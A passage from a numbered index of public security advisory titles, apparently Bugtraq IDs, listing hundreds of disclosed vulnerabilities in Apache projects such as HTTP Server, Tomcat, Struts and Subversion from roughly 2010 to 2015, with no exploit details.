5683| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
5684| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
5685| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
5686| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
5687| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
5688| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
5689| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
5690| [76933] Apache James Server Unspecified Command Execution Vulnerability
5691| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
5692| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
5693| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
5694| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
5695| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
5696| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
5697| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
5698| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
5699| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
5700| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
5701| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
5702| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
5703| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
5704| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
5705| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
5706| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
5707| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
5708| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
5709| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
5710| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
5711| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
5712| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
5713| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
5714| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
5715| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
5716| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
5717| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
5718| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
5719| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
5720| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
5721| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
5722| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
5723| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
5724| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
5725| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
5726| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
5727| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
5728| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
5729| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
5730| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
5731| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
5732| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
5733| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
5734| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
5735| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
5736| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
5737| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
5738| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
5739| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
5740| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
5741| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
5742| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
5743| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
5744| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
5745| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
5746| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
5747| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
5748| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
5749| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
5750| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
5751| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
5752| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
5753| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
5754| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
5755| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
5756| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
5757| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
5758| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
5759| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
5760| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
5761| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
5762| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
5763| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
5764| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
5765| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
5766| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
5767| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
5768| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
5769| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
5770| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
5771| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
5772| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
5773| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
5774| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
5775| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
5776| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
5777| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
5778| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
5779| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
5780| [68229] Apache Harmony PRNG Entropy Weakness
5781| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
5782| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
5783| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
5784| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
5785| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
5786| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
5787| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
5788| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
5789| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
5790| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
5791| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
5792| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
5793| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
5794| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
5795| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
5796| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
5797| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
5798| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
5799| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
5800| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
5801| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
5802| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
5803| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
5804| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
5805| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
5806| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
5807| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
5808| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
5809| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
5810| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
5811| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
5812| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
5813| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
5814| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
5815| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
5816| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
5817| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
5818| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
5819| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
5820| [64780] Apache CloudStack Unauthorized Access Vulnerability
5821| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
5822| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
5823| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
5824| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
5825| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
5826| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
5827| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
5828| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
5829| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
5830| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
5831| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
5832| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
5833| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
5834| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
5835| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
5836| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
5837| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
5838| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
5839| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
5840| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
5841| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
5842| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
5843| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
5844| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
5845| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
5846| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
5847| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
5848| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
5849| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
5850| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
5851| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
5852| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
5853| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
5854| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
5855| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
5856| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
5857| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
5858| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
5859| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
5860| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
5861| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
5862| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
5863| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
5864| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
5865| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
5866| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
5867| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
5868| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
5869| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
5870| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
5871| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
5872| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
5873| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
5874| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
5875| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
5876| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
5877| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
5878| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
5879| [59670] Apache VCL Multiple Input Validation Vulnerabilities
5880| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
5881| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
5882| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
5883| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
5884| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
5885| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
5886| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
5887| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
5888| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
5889| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
5890| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
5891| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
5892| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
5893| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
5894| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
5895| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
5896| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
5897| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
5898| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
5899| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
5900| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
5901| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
5902| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
5903| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
5904| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
5905| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
5906| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
5907| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
5908| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
5909| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
5910| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
5911| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
5912| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
5913| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
5914| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
5915| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
5916| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
5917| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
5918| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
5919| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
5920| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
5921| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
5922| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
5923| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
5924| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
5925| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
5926| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
5927| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
5928| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
5929| [54798] Apache Libcloud Man In The Middle Vulnerability
5930| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
5931| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
5932| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
5933| [54189] Apache Roller Cross Site Request Forgery Vulnerability
5934| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
5935| [53880] Apache CXF Child Policies Security Bypass Vulnerability
5936| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
5937| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
5938| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
5939| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
5940| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
5941| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
5942| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
5943| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
5944| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
5945| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
5946| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
5947| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
5948| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
5949| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
5950| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
5951| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
5952| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
5953| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
5954| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
5955| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
5956| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
5957| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
5958| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
5959| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
5960| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
5961| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
5962| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
5963| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
5964| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
5965| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
5966| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
5967| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
5968| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
5969| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
5970| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
5971| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
5972| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
5973| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
5974| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
5975| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
5976| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
5977| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
5978| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
5979| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
5980| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
5981| [49290] Apache Wicket Cross Site Scripting Vulnerability
5982| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
5983| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
5984| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
5985| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
5986| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
5987| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
5988| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
5989| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
5990| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
5991| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
5992| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
5993| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
5994| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
5995| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
5996| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
5997| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
5998| [46953] Apache MPM-ITK Module Security Weakness
5999| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
6000| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
6001| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
6002| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
6003| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
6004| [46166] Apache Tomcat JVM Denial of Service Vulnerability
6005| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
6006| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
6007| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
6008| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
6009| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
6010| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
6011| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
6012| [44616] Apache Shiro Directory Traversal Vulnerability
6013| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
6014| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
6015| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
6016| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
6017| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
6018| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
6019| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
6020| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
6021| [42492] Apache CXF XML DTD Processing Security Vulnerability
6022| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
6023| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
6024| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
6025| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
6026| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
6027| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
6028| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
6029| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
6030| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
6031| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
6032| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
6033| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
6034| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
6035| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
6036| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
6037| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
6038| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
6039| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
6040| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
6041| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
6042| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
6043| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
6044| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
6045| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
6046| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
6047| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
6048| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
